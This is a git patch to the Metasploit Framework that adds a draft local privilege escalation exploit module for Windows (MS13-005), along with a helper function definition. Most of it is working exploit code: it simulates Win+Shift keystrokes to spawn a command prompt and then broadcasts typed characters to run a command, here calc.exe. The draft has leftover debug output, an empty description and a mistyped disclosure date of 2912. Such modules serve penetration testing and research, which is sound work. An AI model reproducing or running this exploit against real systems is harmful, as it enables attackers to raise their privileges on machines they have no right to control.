From 0235e6803d57f17e517f32952a582ae02f0421c3 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Thu, 25 Jul 2013 23:24:11 +0100 Subject: [PATCH] Initial working --- .../stdapi/railgun/def/def_kernel32.rb | 2 + modules/exploits/windows/local/ms13_005.rb | 105 ++++++++++++++++++ 2 files changed, 107 insertions(+) create mode 100644 modules/exploits/windows/local/ms13_005.rb diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb index 553b995960..fac210dda8 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb @@ -11,6 +11,8 @@ class Def_kernel32 def self.create_dll(dll_path = 'kernel32') dll = DLL.new(dll_path, ApiConstants.manager) + + dll.add_function( 'GetConsoleWindow', 'LPVOID',[]) dll.add_function( 'ActivateActCtx', 'BOOL',[ ["HANDLE","hActCtx","inout"], diff --git a/modules/exploits/windows/local/ms13_005.rb b/modules/exploits/windows/local/ms13_005.rb new file mode 100644 index 0000000000..63f75d6ac7 --- /dev/null +++ b/modules/exploits/windows/local/ms13_005.rb @@ -0,0 +1,105 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/exploit/exe' + +class Metasploit3 < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Exploit::EXE + + def initialize(info={}) + super( update_info( info, + 'Name' => 'MS13-005 Low Integrity to Medium Integrity Privilege Escalation', + 'Description' => %q{ + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Ben Campbell ', + 'Tavis Ormandy', #Discovery + 'Axel Souchet' #@0vercl0k POC + ], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'Targets' => + [ + [ 'Windows x86', { 'Arch' => ARCH_X86 } ], + [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate'=> "Nov 27 2912" + # References CVE-2013-0008 + )) + end + + def win_shift(number) + vk = 0x30 + number + bscan = 0x81 + number + client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 0, 0) + client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 0, 0) + client.railgun.user32.keybd_event(vk, bscan, 0, 0) + + client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 'KEYEVENTF_KEYUP', 0) + client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 'KEYEVENTF_KEYUP', 0) + client.railgun.user32.keybd_event(vk, bscan, 'KEYEVENTF_KEYUP', 0) + end + + def count_cmd_procs + count = 0 + client.sys.process.each_process do |proc| + if proc['name'] == 'cmd.exe' + count += 1 + end + end + puts count + + return count + end + + # Run Method for when run command is issued + def exploit + @payload_name = datastore['PAYLOAD'] + @payload_arch = framework.payloads.create(@payload_name).arch + + # syinfo is only on meterpreter sessions + print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? + hwin = client.railgun.kernel32.GetConsoleWindow()['return'] + if hwin == nil + hwin = client.railgun.user32.GetForegroundWindow()['return'] + end + puts client.railgun.user32.ShowWindow(hwin, 0) + puts client.railgun.user32.ShowWindowAsync(hwin, 5) + # Spawn low integrity cmd.exe + li_cmd_pid = client.sys.process.execute("cmd.exe", nil, {'Hidden' => false }).pid + + count = count_cmd_procs + # Win+Shift+? + number = 0 + begin # Ruby DoWhile! + i = (9 - number) + win_shift(number) + number += 1 + sleep(1) + end while count_cmd_procs == count and number <= 9 + print_status "Spawned!!!" + + client.sys.process.kill(li_cmd_pid) + payload = "calc.exe" + hwnd_broadcast = 0xffff + wm_char = 0x0102 + payload.each_char do |c| + client.railgun.user32.SendMessageA(hwnd_broadcast, wm_char, c.unpack('c').first, 0) + end + + client.railgun.user32.SendMessageA(hwnd_broadcast, wm_char, 'VK_RETURN', 0) + + end +end +